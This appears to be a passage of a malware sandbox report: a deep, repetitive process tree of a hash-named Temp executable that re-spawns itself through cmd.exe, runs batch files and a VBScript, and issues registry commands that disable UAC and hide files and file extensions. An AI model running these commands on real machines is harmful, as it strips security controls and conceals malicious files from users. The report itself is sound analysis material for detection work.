\??\C:\Windows\system32\conhost.exe "687200451-200129539-20475644181158260624-1344191380162733931115368204191189022735"
1⤵
PID:1844

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:2920
- - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
    C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
    3⤵
    PID:1072
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:1884
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\YmsMcYQY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
      4⤵
      PID:1372
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:568
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      Modifies visibility of file extensions in Explorer
      PID:884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\VugMooYc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:2240
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:2764
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1204
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1200
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:2624

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:3044
- C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
  C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
  2⤵
  PID:788
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
    3⤵
    PID:1556
  - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
      C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
      4⤵
      PID:2524
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\IsIgIUgc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        5⤵
        
        PID:884
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        UAC bypass
        
        PID:2064
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        Modifies registry key
        
        PID:2788
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies registry key
        
        PID:2752
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        5⤵
        
        PID:2352
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\EmgUgsgY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
    3⤵
    PID:992
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2880

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\kQMAgkcM.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:2904
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:2116

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1334846973919615578-3843486981589973806998377136-682077960932580541-301297146"
1⤵
- UAC bypass
PID:2504

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2288
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:2220
- - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
    C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
    3⤵
    PID:2836
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\XCAcsMgE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
      4⤵
      PID:988
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:2904
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      UAC bypass
      Modifies registry key
      PID:2756
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:3024
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      PID:2772
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
      4⤵
      PID:1928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\UkQcEUUg.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:1476
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:1644
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1676
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1840
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:1564

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2172
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:1424
- - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
    C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
    3⤵
    PID:1488
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
      4⤵
      PID:572
    - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        5⤵
        
        PID:1772
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        6⤵
        
        PID:2696
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        7⤵
        
        PID:2152
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        8⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        9⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        10⤵
        
        PID:1056
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        11⤵
        
        PID:2296
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        12⤵
        
        PID:1380
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        13⤵
        
        PID:1976
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        14⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        15⤵
        
        PID:2644
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        16⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        17⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        18⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        19⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        20⤵
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        21⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        22⤵
        
        PID:1700
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        23⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        24⤵
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        25⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        26⤵
        
        PID:2500
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        27⤵
        
        PID:908
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        28⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        29⤵
        
        PID:1692
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        30⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        31⤵
        
        PID:872
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        32⤵
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        33⤵
        
        PID:2696
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        34⤵
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        35⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        36⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        36⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\dQYMYoMo.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        36⤵
        
        PID:1312
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\xwcYAkAM.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        37⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        38⤵
        
        PID:2460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        37⤵
        UAC bypass
        Modifies registry key
        
        PID:2252
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        37⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        37⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        37⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\BEcgcgIU.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        35⤵
        
        PID:2796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        35⤵
        
        PID:1284
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        35⤵
        
        PID:528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        35⤵
        
        PID:2932
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        35⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        34⤵
        Modifies registry key
        
        PID:1372
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\eAEcwUQE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        34⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        35⤵
        
        PID:1504
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        34⤵
        UAC bypass
        
        PID:800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        34⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        32⤵
        
        PID:2624
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        32⤵
        Modifies registry key
        
        PID:1904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        30⤵
        
        PID:2164
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\lUYEYEAQ.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        30⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        31⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        32⤵
        
        PID:2640
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        33⤵
        Modifies registry key
        
        PID:1680
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\QYMAEAsE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        33⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        33⤵
        
        PID:892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        33⤵
        
        PID:2256
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        33⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        32⤵
        
        PID:2472
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        30⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        30⤵
        
        PID:2508
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        29⤵
        
        PID:1244
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        28⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        29⤵
        
        PID:2488
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        30⤵
        
        PID:560
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZiEUUQck.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        30⤵
        
        PID:2184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        30⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:2192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        30⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        30⤵
        
        PID:2852
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        30⤵
        UAC bypass
        
        PID:292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        30⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        30⤵
        
        PID:1628
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        30⤵
        
        PID:1740
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RGYUMEYk.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        28⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        29⤵
        
        PID:2540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        28⤵
        
        PID:1556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        28⤵
        
        PID:280
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        26⤵
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        27⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        26⤵
        
        PID:1956
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\TckEgogY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        26⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        27⤵
        
        PID:2768
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        27⤵
        
        PID:328
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        26⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        24⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        25⤵
        
        PID:2460
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\fegQYYcE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        24⤵
        
        PID:928
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        25⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        24⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        24⤵
        
        PID:1748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        22⤵
        
        PID:2456
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\VkwgwcYg.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        22⤵
        
        PID:2092
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        23⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\reg.exe
        
